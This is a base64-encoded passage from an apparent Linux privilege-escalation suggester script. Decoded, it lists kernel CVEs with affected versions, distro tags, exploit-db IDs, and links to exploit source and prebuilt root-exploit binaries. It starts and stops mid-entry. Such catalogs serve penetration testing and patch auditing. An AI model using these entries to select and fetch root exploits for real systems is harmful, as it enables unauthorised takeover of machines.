SYW5rOiAxCmV4cGxvaXQtZGI6IDgzNjkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyXSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChzaW1wbGUgdmVyc2lvbikKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT03LjEwLFJIRUw9NCxmZWRvcmE9NHw1fDZ8N3w4fDl8MTB8MTEKUmFuazogMQpleHBsb2l0LWRiOiA5NDc5CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT05LjA0ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hvcmwud29yZHByZXNzLmNvbS8yMDA5LzA3LzE2L2N2ZS0yMDA5LTE4OTUtbGludXgta2VybmVsLXBlcl9jbGVhcl9vbl9zZXRpZC1wZXJzb25hbGl0eS1ieXBhc3MvCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzk0MzUudGd6CmV4cGxvaXQtZGI6IDk0MzUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAgT1IgcHVsc2VhdWRpbyBuZWVkcyB0byBiZSBpbnN0YWxsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NDM2LnRnegpleHBsb2l0LWRiOiA5NDM2CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NjQxLnRhci5negpleHBsb2l0LWRiOiA5NjQxCkNvbW1lbnRzOiAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBuZWVkcyB0byBlcXVhbCAwIE9SIHB1bHNlYXVkaW8gbmVlZHMgdG8gYmUgaW5zdGFsbGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMjY5MixDVkUtMjAwOS0xODk1XSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChwcGMpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiB1YnVudHU9OC4xMCxSSEVMPTR8NQpSYW5rOiAxCmV4cGxvaXQtZGI6IDk1NDUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSB0aGUgcmViZWwgKHVkcF9zZW5kbXNnKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkKVGFnczogZGViaWFuPTQKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NTc0LnRnegpleHBsb2l0LWRiOiA5NTc0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmNyMC5vcmcvMjAwOS8wOC9jdmUtMjAwOS0yNjk4LXVkcHNlbmRtc2ctdnVsbmVyYWJpbGl0eS5odG1sCmF1dGhvcjogc3BlbmRlcgpDb21tZW50czogL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgbmVlZHMgdG8gZXF1YWwgMCBPUiBwdWxzZWF1ZGlvIG5lZWRzIHRvIGJlIGluc3RhbGxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGhvYWdpZV91ZHBfc2VuZG1zZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGRlYmlhbj00ClJhbms6IDEKZXhwbG9pdC1kYjogOTU3NQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IGFuZGkKQ29tbWVudHM6IFdvcmtzIGZvciBzeXN0ZW1zIHdpdGggL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgZXF1YWwgdG8gMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGthdG9uICh1ZHBfc2VuZG1zZykKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xLHZlcjw9Mi42LjE5LHg4NgpUYWdzOiBkZWJpYW49NApSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9LYWJvdC9Vbml4LVByaXZpbGVnZS1Fc2NhbGF0aW9uLUV4cGxvaXRzLVBhY2svcmF3L21hc3Rlci8yMDA5L0NWRS0yMDA5LTI2OTgva2F0b24uYwphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IFZ4SGVsbCBMYWJzCkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSBpcF9hcHBlbmRfZGF0YQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGZlZG9yYT00fDV8NixSSEVMPTQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbApleHBsb2l0LWRiOiA5NTQyCmF1dGhvcjogcDBjNzNuMQpDb21tZW50czogV29ya3MgZm9yIHN5c3RlbXMgd2l0aCAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBlcXVhbCB0byAwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMzU0N10ke3R4dHJzdH0gcGlwZS5jIDEKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMxClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMzMzMjEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0zNTQ3XSR7dHh0cnN0fSBwaXBlLmMgMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAzMzMyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTM1NDddJHt0eHRyc3R9IHBpcGUuYyAzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDEwMDE4CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzMwMV0ke3R4dHJzdH0gcHRyYWNlX2ttb2QyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMjYsdmVyPD0yLjYuMzQKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMnwzM3wzNHwzNSktKDF8Mnx0cnVuayktYW1kNjR9LHVidW50dT0oMTAuMDR8MTAuMTApe2tlcm5lbDoyLjYuKDMyfDM1KS0oMTl8MjF8MjQpLXNlcnZlcn0KUmFuazogMQpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxMTExMDMwNDI5MDQvaHR0cDovL3RhcmFudHVsYS5ieS5ydS9sb2NhbHJvb3QvMi42Lngva21vZDIKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L3B0cmFjZS1rbW9kCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjY0MS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3B0cmFjZV9rbW9kMi02NApleHBsb2l0LWRiOiAxNTAyMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTExNDZdJHt0eHRyc3R9IHJlaXNlcmZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD0yLjYuMzQKVGFnczogdWJ1bnR1PTkuMTAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vam9uLm9iZXJoZWlkZS5vcmcvYmxvZy8yMDEwLzA0LzEwL3JlaXNlcmZzLXJlaXNlcmZzX3ByaXYtdnVsbmVyYWJpbGl0eS8Kc3JjLXVybDogaHR0cHM6Ly9qb24ub2JlcmhlaWRlLm9yZy9maWxlcy90ZWFtLWVkd2FyZC5weQpleHBsb2l0LWRiOiAxMjEzMApjb21tZW50czogUmVxdWlyZXMgYSBSZWlzZXJGUyBmaWxlc3lzdGVtIG1vdW50ZWQgd2l0aCBleHRlbmRlZCBhdHRyaWJ1dGVzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMjk1OV0ke3R4dHJzdH0gY2FuX2JjbQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE4LHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLTI0LWdlbmVyaWN9ClJhbms6IDEKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvY2FuX2JjbQpleHBsb2l0LWRiOiAxNDgxNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTM5MDRdJHt0eHRyc3R9IHJkcwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjMwLHZlcjwyLjYuMzcKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMXwzMnwzNHwzNSktKDF8dHJ1bmspLWFtZDY0fSx1YnVudHU9MTAuMTB8OS4xMCxmZWRvcmE9MTN7a2VybmVsOjIuNi4zMy4zLTg1LmZjMTMuaTY4Ni5QQUV9LHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLSgyMXwyNCktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYXJjaGl2ZS8xLzUxNDM3OQpzcmMtdXJsOiBodHRwOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDEwMTAyMDA0NDA0OC9odHRwOi8vd3d3LnZzZWN1cml0eS5jb20vZG93bmxvYWQvdG9vbHMvbGludXgtcmRzLWV4cGxvaXQuYwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2NDEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9yZHMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcmRzNjQKZXhwbG9pdC1kYjogMTUyODUKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zODQ4LENWRS0yMDEwLTM4NTAsQ1ZFLTIwMTAtNDA3M10ke3R4dHJzdH0gaGFsZl9uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oMTAuMDR8OS4xMCl7a2VybmVsOjIuNi4oMzF8MzIpLSgxNHwyMSktc2VydmVyfQpSYW5rOiAxCmJpbi11cmw6IGh0dHA6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvaGFsZi1uZWxzb24zCmV4cGxvaXQtZGI6IDE3Nzg3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bTi9BXSR7dHh0cnN0fSBjYXBzX3RvX3Jvb3QKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zNCx2ZXI8PTIuNi4zNix4ODYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtOL0FdJHt0eHRyc3R9IGNhcHNfdG9fcm9vdCAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzQsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MzQ3XSR7dHh0cnN0fSBhbWVyaWNhbi1zaWduLWxhbmd1YWdlClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zNgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE1Nzc0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzQzN10ke3R4dHJzdH0gcGt0Y2R2ZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjA0ClJhbms6IDEKZXhwbG9pdC1kYjogMTUxNTAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zMDgxXSR7dHh0cnN0fSB2aWRlbzRsaW51eApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzMKVGFnczogUkhFTD01ClJhbms6IDEKZXhwbG9pdC1kYjogMTUwMjQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2XSR7dHh0cnN0fSBtZW1vZGlwcGVyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTMuMS4wClRhZ3M6IHVidW50dT0oMTAuMDR8MTEuMTApe2tlcm5lbDozLjAuMC0xMi0oZ2VuZXJpY3xzZXJ2ZXIpfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXQuengyYzQuY29tL0NWRS0yMDEyLTAwNTYvYWJvdXQvCnNyYy11cmw6IGh0dHBzOi8vZ2l0Lnp4MmM0LmNvbS9DVkUtMjAxMi0wMDU2L3BsYWluL21lbXBvZGlwcGVyLmMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvbWVtb2RpcHBlcgpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9tZW1vZGlwcGVyNjQKZXhwbG9pdC1kYjogMTg0MTEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2LENWRS0yMDEwLTM4NDksQ1ZFLTIwMTAtMzg1MF0ke3R4dHJzdH0gZnVsbC1uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oOS4xMHwxMC4xMCl7a2VybmVsOjIuNi4oMzF8MzUpLSgxNHwxOSktKHNlcnZlcnxnZW5lcmljKX0sdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItKDIxfDI0KS1zZXJ2ZXJ9ClJhbms6IDEKc3JjLXVybDogaHR0cDovL3Z1bG5mYWN0b3J5Lm9yZy9leHBsb2l0cy9mdWxsLW5lbHNvbi5jCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uNjQKZXhwbG9pdC1kYjogMTU3MDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0xODU4XSR7dHh0cnN0fSBDTE9ORV9ORVdVU0VSfENMT05FX0ZTClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPTMuOCxDT05GSUdfVVNFUl9OUz15ClRhZ3M6IApSYW5rOiAxCnNyYy11cmw6IGh0dHA6Ly9zdGVhbHRoLm9wZW53YWxsLm5ldC94U3BvcnRzL2Nsb3duLW5ld3VzZXIuYwphbmFseXNpcy11cmw6IGh0dHBzOi8vbHduLm5ldC9BcnRpY2xlcy81NDMyNzMvCmV4cGxvaXQtZGI6IDM4MzkwCmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQgCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45LHg4Nl82NApUYWdzOiBSSEVMPTYsdWJ1bnR1PTEyLjA0e2tlcm5lbDozLjIuMC0oMjN8MjkpLWdlbmVyaWN9LGZlZG9yYT0xNntrZXJuZWw6My4xLjAtNy5mYzE2Lng4Nl82NH0sZmVkb3JhPTE3e2tlcm5lbDozLjMuNC01LmZjMTcueDg2XzY0fSxkZWJpYW49N3trZXJuZWw6My4yLjAtNC1hbWQ2NH0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8KYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcGVyZl9zd2V2ZW50CmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3BlcmZfc3dldmVudDY0CmV4cGxvaXQtZGI6IDI2MTMxCmF1dGhvcjogQW5kcmVhICdzb3JibycgQml0dGF1CkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMix2ZXI8My44LjkseDg2XzY0ClRhZ3M6IHVidW50dT0xMi4wNHtrZXJuZWw6My4oMnw1KS4wLSgyM3wyOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8Kc3JjLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2V4cGxvaXRzL3ZuaWtfdjEuYwpleHBsb2l0LWRiOiAzMzU4OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMDI2OF0ke3R4dHJzdH0gbXNyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPDMuNy42ClRhZ3M6IApSYW5rOiAxCmV4cGxvaXQtZGI6IDI3Mjk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMTk1OV0ke3R4dHJzdH0gdXNlcm5zX3Jvb3Rfc3Bsb2l0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My44LjkKVGFnczogClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxMy8wNC8yOS8xCmV4cGxvaXQtZGI6IDI1NDUwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gc2VtdGV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45ClRhZ3M6IFJIRUw9NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3RpbWV0b2JsZWVkLmNvbS9hLWNsb3Nlci1sb29rLWF0LWEtcmVjZW50LXByaXZpbGVnZS1lc2NhbGF0aW9uLWJ1Zy1pbi1saW51eC1jdmUtMjAxMy0yMDk0LwpleHBsb2l0LWRiOiAyNTQ0NApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAwMzhdJHt0eHRyc3R9IHRpbWVvdXRwd24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuNC4wLHZlcjw9My4xMy4xLENPTkZJR19YODZfWDMyPXkKVGFnczogdWJ1bnR1PTEzLjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vYmxvZy5pbmNsdWRlc2VjdXJpdHkuY29tLzIwMTQvMDMvZXhwbG9pdC1DVkUtMjAxNC0wMDM4LXgzMi1yZWN2bW1zZy1rZXJuZWwtdnVsbmVyYWJsaXR5Lmh0bWwKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvdGltZW91dHB3bjY0CmV4cGxvaXQtZGI6IDMxMzQ2CkNvbW1lbnRzOiBDT05GSUdfWDg2X1gzMiBuZWVkcyB0byBiZSBlbmFibGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDAzOF0ke3R4dHJzdH0gdGltZW91dHB3biAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjQuMCx2ZXI8PTMuMTMuMSxDT05GSUdfWDg2X1gzMj15ClRhZ3M6IHVidW50dT0oMTMuMDR8MTMuMTApe2tlcm5lbDozLig4fDExKS4wLSgxMnwxNXwxOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9ibG9nLmluY2x1ZGVzZWN1cml0eS5jb20vMjAxNC8wMy9leHBsb2l0LUNWRS0yMDE0LTAwMzgteDMyLXJlY3ZtbXNnLWtlcm5lbC12dWxuZXJhYmxpdHkuaHRtbApleHBsb2l0LWRiOiAzMTM0NwpDb21tZW50czogQ09ORklHX1g4Nl9YMzIgbmVlZHMgdG8gYmUgZW5hYmxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAxOTZdJHt0eHRyc3R9IHJhd21vZGVQVFkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMSx2ZXI8PTMuMTQuMwpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2Jsb2cuaW5jbHVkZXNlY3VyaXR5LmNvbS8yMDE0LzA2L2V4cGxvaXQtd2Fsa3Rocm91Z2gtY3ZlLTIwMTQtMDE5Ni1wdHkta2VybmVsLXJhY2UtY29uZGl0aW9uLmh0bWwKZXhwbG9pdC1kYjogMzM1MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC0yODUxXSR7dHh0cnN0fSB1c2UtYWZ0ZXItZnJl